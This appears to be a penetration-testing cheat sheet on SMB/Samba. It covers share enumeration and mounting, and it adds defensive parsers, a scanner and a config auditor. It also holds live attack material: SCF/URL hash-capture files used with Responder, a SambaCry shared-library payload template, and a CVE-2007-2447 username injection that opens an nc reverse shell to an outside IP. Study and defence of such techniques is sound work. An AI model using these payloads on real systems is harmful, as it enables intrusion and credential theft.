SMB

Port : 445,139

Reference

Guide: https://www.hackingarticles.in/smb-penetration-testing-port-445/

Troubleshooting

#Protocol negotiation failed: NT_STATUS_CONNECTION_DISCONNECTED
#Add to 'global' section in /etc/samba/smb.conf
client min protocol = LANMAN1

  • Nmap Scripts

    • smb-os-discovery.nse [OS Detection]

    • smb-vuln* [Checks for Windows remote vulnerabilities]

    • smb-vuln-ms17-010 [Checks if SMBv1 server is vulnerable]

Enumerating Shares

enum4linux -a <IP>
python3 nullinux.py -u "username" -p "password" -q

#List Shares
smbmap -u "" -p "" -P 445 -H <DC IP> && smbmap -u "guest" -p "" -P 445 -H <DC IP>
smbmap -H <IP> -u username -p password

crackmapexec smb -u notarealuser -p '' --shares <IP>

#Deprecated protocols
smbclient -L \\\\10.10.10.3\\ --option='client min protocol=NT1'

#Server requested LANMAN password (share-level security) but 'client lanman auth = no' or 'client ntlmv2 auth = yes'
#Set the following in /etc/samba/smb.conf to be able to connect to those old servers.
client lanman auth = yes
client ntlmv2 auth = no

#List contents of share
smbmap -R Share_name -H 10.10.10.100
smbclient //10.10.10.102/Sharename
#-k to use cached kerberos TGT
smbclient -k -L //<IP.local>

#Download shares [-q :Quiet mode]
smbmap -R Share_name -H 10.10.10.100 -A Filename -q -u notarealusername
smbclient //10.10.10.100/Share_name -U ""%"" -c 'prompt OFF;recurse ON; mget *'
#Single file, from within an interactive smbclient session
get file.txt

#Logging into SMB Share [-N :suppresses password prompt]
smbclient \\\\10.10.10.100\\Share_name -U "Username"%"Password"
smbclient -N \\\\10.10.10.123\\Share_name

#impacket
smbclient.py <Domain>/<Username>:<Password>@<IP-Address>
  • In case of error: [!] Authentication error on <IP>

#e.g. when running
smbmap -H 10.10.10.3 -u notausername
#Try this
pip3 install --upgrade impacket

Version Enumeration

Ref: https://raw.githubusercontent.com/amitn322/smb-version/master/samba_version.py

sudo python samba_version.py -s <IP>

Manually Identify Version

  • Run wireshark and start sniffing

  • Run: smbclient -L \\\\<IP>

  • Stop sniffing and find the packet with Protocol: SMB and Info: Session Setup AndX Response

  • The Native OS and Native LAN Manager fields of that response carry the server's version string (e.g. the Samba release)
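Added example, not code from the page or from any tool it references: a small Python parser that pulls the Native OS, Native LAN Manager and Primary Domain strings out of an SMB1 Session Setup AndX Response, i.e. the same fields you read off the Wireshark packet above. It handles the plain (WordCount 3) and extended-security (WordCount 4) layouts and both ASCII and UTF-16LE strings. `build_sample_response` constructs a test packet; it is not a capture, and its field values are constructed (the `Samba 3.0.20-Debian` banner reuses the version quoted later on this page).

```python
import struct

SMB_COM_SESSION_SETUP_ANDX = 0x73
FLAGS2_UNICODE = 0x8000
SMB_HEADER_LEN = 32          # fixed SMB1 header after the 4-byte NetBIOS header


def _read_cstring(buf, off, unicode):
    """Read a NUL-terminated string at buf[off:]; returns (text, offset after NUL)."""
    if unicode:
        end = off
        while end + 1 < len(buf) and buf[end:end + 2] != b"\x00\x00":
            end += 2
        return buf[off:end].decode("utf-16-le", "replace"), end + 2
    end = buf.index(b"\x00", off)
    return buf[off:end].decode("latin-1"), end + 1


def parse_session_setup_response(pkt):
    """Parse an SMB1 Session Setup AndX Response (NetBIOS header included) and
    return its NativeOS / NativeLanMan / PrimaryDomain strings."""
    smb = pkt[4:]                                  # drop NetBIOS session header
    if len(smb) < SMB_HEADER_LEN + 3 or smb[:4] != b"\xffSMB":
        raise ValueError("not an SMB1 message")
    if smb[4] != SMB_COM_SESSION_SETUP_ANDX:
        raise ValueError("not a Session Setup AndX message")
    flags2 = struct.unpack_from("<H", smb, 10)[0]
    unicode = bool(flags2 & FLAGS2_UNICODE)
    word_count = smb[SMB_HEADER_LEN]
    words_end = SMB_HEADER_LEN + 1 + 2 * word_count
    byte_count = struct.unpack_from("<H", smb, words_end)[0]
    data_off = words_end + 2
    msg = smb[:data_off + byte_count]              # ignore anything past ByteCount
    if word_count == 4:
        # extended security: a SecurityBlob (GSS/SPNEGO) precedes the strings
        blob_len = struct.unpack_from("<H", smb, SMB_HEADER_LEN + 7)[0]
        data_off += blob_len
    elif word_count != 3:
        raise ValueError(f"unexpected WordCount {word_count}")
    if unicode and data_off % 2:
        data_off += 1                              # Unicode strings are 2-byte aligned
    native_os, off = _read_cstring(msg, data_off, unicode)
    native_lanman, off = _read_cstring(msg, off, unicode)
    primary_domain = ""
    if off < len(msg):
        primary_domain, _ = _read_cstring(msg, off, unicode)
    return {"native_os": native_os, "native_lanman": native_lanman,
            "primary_domain": primary_domain, "unicode": unicode}


def build_sample_response(native_os, native_lanman, domain, unicode=False):
    """Constructed Session Setup AndX Response for testing; not a real capture."""
    def enc(s):
        return (s.encode("utf-16-le") + b"\x00\x00") if unicode else (s.encode("latin-1") + b"\x00")
    flags2 = FLAGS2_UNICODE if unicode else 0
    header = (b"\xffSMB" + bytes([SMB_COM_SESSION_SETUP_ANDX])
              + struct.pack("<I", 0)               # NT status: success
              + b"\x88"                            # Flags: reply, case-insensitive
              + struct.pack("<H", flags2)
              + b"\x00" * 12                       # PIDHigh, SecurityFeatures, Reserved
              + struct.pack("<HHHH", 0, 0x1234, 0x64, 1))   # TID, PIDLow, UID, MID
    words = b"\xff\x00" + struct.pack("<HH", 0, 0)           # no AndX, Action 0
    data = b"\x00" if unicode else b""             # alignment pad for Unicode
    data += enc(native_os) + enc(native_lanman) + enc(domain)
    body = header + bytes([3]) + words + struct.pack("<H", len(data)) + data
    return b"\x00" + len(body).to_bytes(3, "big") + body


if __name__ == "__main__":
    pkt = build_sample_response("Unix", "Samba 3.0.20-Debian", "WORKGROUP")
    print(parse_session_setup_response(pkt))
```

Feed it the bytes of a Session Setup AndX Response exported from Wireshark (or captured with a raw socket) and the `native_lanman` value is the banner the manual procedure above has you read by eye.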

RestrictAnonymous Bypass

  • Username enumeration via SID walk

https://vidstromlabs.com/freetools/dumpusers/

Mounting Shares

NFS (Network File System) is a popular distributed file system. NFS shares are configured in the /etc/exports file. Remote users can mount shares and read, create and modify files. By default, created files inherit the remote user's uid and gid (as owner and group respectively), even if those ids don't exist on the NFS server.

#Check for mountable shares
showmount -e 10.10.10.53

#Lists current mounted directories
df -k

ls /mnt
mount -t cifs -o username=notarealname,password=<Empty-for-null-login> //10.10.10.100/Sharename /mnt/local_dir_name

#Mount NFS Shares
sudo mkdir /tmp/tmpdir
sudo mount -t nfs 10.10.10.53:/Sharename /tmp/tmpdir
mount -t nfs [-o vers=2] <ip>:<remote_folder> /tmp/tmpdir -o nolock
#Unmount all CIFS mounts
sudo umount -a -t cifs

#Script for checking if share is writable
#writable.sh
#!/bin/bash
#Walk every directory under /mnt; -print0 / read -d '' keep paths with spaces intact
find /mnt -type d -print0 | while IFS= read -r -d '' d
do
  #Try to create a probe file; quoted "$d" so odd share names don't break the test
  if touch "$d/.writable_probe" 2>/dev/null
  then
    echo "$d is writable"
    rm -f "$d/.writable_probe"   #clean up the probe
  fi
done

Mounting VHD Shares

#Mount the share
mount -t cifs -o 'rw,username=guest' //10.10.10.134/Backups localdirectory_name
#Mount the vhd file within this share
guestmount -a /mnt/remote/path/to/vhdfile.vhd -m /dev/sda1 --ro /root/bastion
  • Tip: Look for the SAM, SECURITY and SYSTEM hive files in C:\Windows\System32\config

Write-Access Attack

SCF and URL file attack against writeable share

Drop the following file, named @something.scf or something.scf, inside the share and start listening with Responder:

  • responder -wrf --lm -v -I eth0 (may not work all the time, try both commands)

  • responder -I tun0

[Shell]
Command=2
IconFile=\\<IP>\Share\test.ico
[Taskbar]
Command=ToggleDesktop

This attack also works with .url files:

[InternetShortcut]
URL=whatever
WorkingDirectory=whatever
IconFile=\\<IP>\%USERNAME%.icon
IconIndex=1
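From the defender's side, the tell-tale of both files above is an IconFile that points at a UNC path on another host (and, in the .url variant, a %USERNAME% token that leaks the victim's account name in the request). The scanner below is an added example, not code from the page: it walks a mounted share, parses every .scf/.url file with a minimal INI-style reader (so %VARS% are left untouched) and reports those two indicators. `demo()` writes constructed sample files to a temporary directory; the 10.10.14.22 address is the one this page uses for its own share and is only a sample value here.

```python
import os
import re
import shutil
import tempfile

# UNC path to a remote host: \\host\share\...
UNC_RE = re.compile(r"^\\\\[^\\]+\\")


def parse_ini_like(text):
    """Minimal parser for the [Section] / Key=Value layout used by .scf and
    .url files; returns {section_lower: {key_lower: value}}.  Unlike
    configparser it performs no interpolation, so %USERNAME% survives as-is."""
    result, section = {}, None
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith((";", "#")):
            continue
        if line.startswith("[") and line.endswith("]"):
            section = line[1:-1].strip().lower()
            result.setdefault(section, {})
        elif "=" in line and section is not None:
            key, _, value = line.partition("=")
            result[section][key.strip().lower()] = value.strip()
    return result


def check_shortcut_file(path):
    """Return a list of findings for one .scf/.url file (empty if benign)."""
    findings = []
    with open(path, "r", encoding="latin-1", errors="replace") as fh:
        data = parse_ini_like(fh.read())
    ext = os.path.splitext(path)[1].lower()
    if ext == ".scf":
        icon = data.get("shell", {}).get("iconfile", "")
    elif ext == ".url":
        icon = data.get("internetshortcut", {}).get("iconfile", "")
    else:
        return findings
    if UNC_RE.match(icon):
        findings.append(f"{path}: IconFile points to a remote UNC path {icon}")
    if "%username%" in icon.lower():
        findings.append(f"{path}: IconFile embeds %USERNAME%, leaking the account name")
    return findings


def scan_share(root):
    """Walk a mounted share and return all findings for .scf/.url files."""
    findings = []
    for dirpath, _, files in os.walk(root):
        for name in files:
            if name.lower().endswith((".scf", ".url")):
                findings.extend(check_shortcut_file(os.path.join(dirpath, name)))
    return findings


def demo():
    """Constructed share contents for demonstration (not files from a real share)."""
    root = tempfile.mkdtemp()
    samples = {
        "@poison.scf": "[Shell]\nCommand=2\nIconFile=\\\\10.10.14.22\\Share\\test.ico\n"
                       "[Taskbar]\nCommand=ToggleDesktop\n",
        "link.url": "[InternetShortcut]\nURL=whatever\nWorkingDirectory=whatever\n"
                    "IconFile=\\\\10.10.14.22\\%USERNAME%.icon\nIconIndex=1\n",
        "benign.url": "[InternetShortcut]\nURL=https://example.org/\n"
                      "IconFile=C:\\Windows\\System32\\url.dll\nIconIndex=0\n",
        "notes.txt": "nothing to see here\n",
    }
    for name, body in samples.items():
        with open(os.path.join(root, name), "w", encoding="latin-1") as fh:
            fh.write(body)
    try:
        return scan_share(root)
    finally:
        shutil.rmtree(root)


if __name__ == "__main__":
    for line in demo():
        print(line)
```

Run `scan_share("/mnt/local_dir_name")` against a share mounted with the cifs commands above; anything it reports is either a planted file or a legitimate shortcut whose icon should be moved to a local path.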

Setting up a Samba Server

sudo smbserver.py -smb2support Data $(pwd)

----
chmod +x /path/to/share/

#/etc/samba/smb.conf
[myshare]
path = /path/to/share
writeable = yes
browseable = yes
public = yes

service smbd restart

net use k: \\10.10.14.22\myshare

#To remove the mapping again
net use k: /delete
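The smb.conf fragment above, together with the client-side settings in the Troubleshooting section (client min protocol = LANMAN1, client lanman auth = yes, client ntlmv2 auth = no), is exactly the configuration a defender would want flagged: a guest-accessible writable share plus SMB1-era dialects and LM/NTLMv1 authentication. The audit below is an added example, not code from the page or from Samba: it parses smb.conf the way Samba reads it (parameter names are case- and whitespace-insensitive, `public`/`guest ok` and `writeable`/`writable`/`write ok` are synonyms) and reports the weak settings. WEAK_CONF is the page's own fragment; HARDENED_CONF is a constructed counterpart, and its `valid users = @smbusers` group name is a placeholder.

```python
# Dialect order Samba uses for "min protocol" settings, oldest first.
PROTO_RANK = ["core", "coreplus", "lanman1", "lanman2", "nt1",
              "smb2_02", "smb2_10", "smb2", "smb3_00", "smb3_02", "smb3_11", "smb3"]

WEAK_CONF = """\
[global]
   client min protocol = LANMAN1
   client lanman auth = yes
   client ntlmv2 auth = no

[myshare]
   path = /path/to/share
   writeable = yes
   browseable = yes
   public = yes
"""

HARDENED_CONF = """\
[global]
   server min protocol = SMB2_02
   client min protocol = SMB2_02
   client lanman auth = no
   client ntlmv2 auth = yes

[myshare]
   path = /path/to/share
   writeable = yes
   browseable = yes
   guest ok = no
   valid users = @smbusers   # hypothetical group name
"""


def parse_smb_conf(text):
    """Return {section: {normalised_key: value}}.  Samba ignores case and
    whitespace inside parameter names, so 'Client Min Protocol' == 'clientminprotocol'."""
    conf, section = {}, None
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].split(";", 1)[0].strip()   # drop comments
        if not line:
            continue
        if line[0] == "[" and line[-1] == "]":
            section = line[1:-1].strip().lower()
            conf.setdefault(section, {})
        elif "=" in line and section is not None:
            key, _, value = line.partition("=")
            conf[section][key.replace(" ", "").lower()] = value.strip().lower()
    return conf


def _yes(value, default):
    """Samba boolean: yes/true/1 are true; None means 'use the default'."""
    v = value if value is not None else default
    return v in ("yes", "true", "1")


def _first(d, *keys):
    """Return the value of the first synonym present in the section, else None."""
    for k in keys:
        if k in d:
            return d[k]
    return None


def audit_smb_conf(text):
    """Return a list of human-readable findings; empty means nothing flagged."""
    conf = parse_smb_conf(text)
    findings = []
    g = conf.get("global", {})
    for key in ("clientminprotocol", "serverminprotocol"):
        proto = g.get(key)
        if proto in PROTO_RANK and PROTO_RANK.index(proto) < PROTO_RANK.index("smb2_02"):
            findings.append(f"[global] {key} = {proto}: permits SMB1-era dialects")
    if _yes(g.get("clientlanmanauth"), "no"):           # Samba default: no
        findings.append("[global] client lanman auth = yes: LM password hashes may be sent")
    if not _yes(g.get("clientntlmv2auth"), "yes"):       # Samba default: yes
        findings.append("[global] client ntlmv2 auth = no: falls back to NTLMv1/LM")
    for name, share in conf.items():
        if name == "global":
            continue
        guest = _yes(_first(share, "guestok", "public"), "no")
        writable = _yes(_first(share, "writeable", "writable", "writeok"), "no")
        if guest and writable:
            findings.append(f"[{name}] is guest-accessible and writable")
        elif guest:
            findings.append(f"[{name}] allows guest (anonymous) access")
    return findings


if __name__ == "__main__":
    for finding in audit_smb_conf(WEAK_CONF):
        print(finding)
    print("hardened:", audit_smb_conf(HARDENED_CONF) or "no findings")
```

Point `audit_smb_conf(open("/etc/samba/smb.conf").read())` at a real file to see which of the relaxations above are still in place after a test; the default values encoded in `_yes` are the ones current Samba ships with.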

#Create an NTFS disk.(2GB)
dd if=/dev/zero of=ntfs.disk bs=1024M count=2
losetup -h
sudo losetup -fP ntfs.disk
losetup -a
sudo mkfs.ntfs /dev/loop0
sudo mount /dev/loop0 /directory/to/mount
mount | grep /directory/to/mount

SambaCry CVE-2017-7494 [RCE]

Reference

  • Remote code execution from a writable share.

  • Versions affected: All versions of Samba from 3.5.0 onwards.

  • Description: Malicious clients can upload and cause the smbd server to execute a shared library from a writable share.

Samba 3.x after 3.5.0 and 4.x before 4.4.14, 4.5.x before 4.5.10, and 4.6.x before 4.6.4 does not restrict the file path when using Windows named pipes, which allows remote authenticated users to upload a shared library to a writable shared folder, and execute arbitrary code via a crafted named pipe.
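For triage it helps to turn the affected-version statement above into a check you can run against the banner a server returns (the Native LAN Manager string, e.g. "Samba 4.5.9-Ubuntu"). The function below is an added example, not code from the page or from Samba: it encodes exactly the ranges quoted above (3.x from 3.5.0 onwards; 4.x before 4.4.14; 4.5.x before 4.5.10; 4.6.x before 4.6.4) and treats 4.7 and later as released after the fix.

```python
import re

# First fixed release on each 4.x branch, taken from the CVE text above.
FIXED_4X = {4: (4, 4, 14), 5: (4, 5, 10), 6: (4, 6, 4)}


def parse_samba_version(banner):
    """Extract (major, minor, patch) from a banner such as 'Samba 4.5.9-Ubuntu';
    returns None when the banner is not a Samba version string."""
    m = re.search(r"\bSamba\s+(\d+)\.(\d+)\.(\d+)", banner)
    return tuple(int(x) for x in m.groups()) if m else None


def sambacry_affected(banner):
    """True if the banner's Samba version falls in the CVE-2017-7494 ranges,
    False if it is outside them, None if the banner is not Samba at all."""
    v = parse_samba_version(banner)
    if v is None:
        return None
    major, minor, _ = v
    if major == 3:
        return v >= (3, 5, 0)                 # "all versions from 3.5.0 onwards"
    if major == 4:
        if minor < 4:
            return True                       # 4.0-4.3: no fixed release on those branches
        if minor in FIXED_4X:
            return v < FIXED_4X[minor]        # below the first fixed release
        return False                          # 4.7+ shipped with the fix
    return False


if __name__ == "__main__":
    for b in ("Samba 3.0.20-Debian", "Samba 4.5.9-Ubuntu", "Samba 4.6.4", "Windows 2000 LAN Manager"):
        print(f"{b!r}: {sambacry_affected(b)}")
```

The check only reflects the upstream version number; distribution builds that backport the fix keep an older version string, so confirm against the vendor's changelog before acting on a positive result. Samba's advisory for this CVE also documents a workaround for servers that cannot be upgraded, `nt pipe support = no` in the [global] section of smb.conf.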

Exploitation

  • Clone the Github Repo


#define _GNU_SOURCE
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>

/* constructor: runs as soon as smbd loads the shared object */
static void smash() __attribute__((constructor));

void smash() {
    setresuid(0,0,0);
    system("<put a bash command here>");
}

then compile with
gcc -o <outfile.so> -shared <infile.c> -fPIC

CVE-2007-2447

  • Version : smbd 3.0.20-Debian [With Anonymous Login]

  • CVE-2007-2447

    • logon : the smbclient logon command changes users once connected

#Set up a listener on the attacker's system first, then connect to the share
smbclient //victim_IP/tmp --option='client min protocol=NT1'

logon "/=`nohup nc -nv 192.168.119.174 4444 -e /bin/sh`"

Samba < 2.2.8 (Linux/BSD) - Remote Code Execution

searchsploit -m 10
gcc exploit.c -o exploit
./exploit -b 0 -v <IP>
